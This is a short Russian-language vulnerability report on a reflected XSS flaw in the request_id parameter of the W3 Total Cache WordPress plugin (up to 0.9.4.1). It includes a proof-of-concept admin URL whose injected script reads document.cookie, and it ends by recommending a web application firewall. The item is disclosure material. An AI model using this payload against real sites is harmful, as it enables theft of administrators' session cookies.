В популярном WordPress плагине W3 Total Cache обнаружена XSS-уязвимость, позволяющая провести клиент-сайд атаку на пользователей CMS.

Уязвимости подвержены версии плагина <=0.9.4.1. Используя эту уязвимость злоумышленник может обойти фильтрацию вводимых данных и внедрить в страницу вредоносный код. Это может позволить ему захватить контроль над чужими учётными данными.

Специалист по информационной безопасности, Fernando A. Lagos Berardi, обнаруживший уязвимость, указывает, что уже больше года не может связаться с разработчиками для устранения уязвимости. Т.е. от момента обнаружения более года уязвимости были подвержены множество сайтов - по статистике сайта WordPress.org активных установок плагина на текущий момент более 1.000.000.

Уязвимость присутствует в параметре request_id.

PoC:

wordpress/wp-admin/admin.php?page=w3tc_support&request_type=bug_report&payment&url=http://example.org&name=test&email=test%40gmail.com&;
twitter&phone&subject=test&description=test&forum_url&wp_login&wp_password&ftp_host&ftp_login&ftp_password&subscribe_releases&subscribe_customer&w3tc_error=support_request&request_id=11111666">alert(document.cookie)<%2Fscript>

Использование Web Application Firewall позволяет блокировать подобные атаки даже при наличии уязвимости "нулевого дня".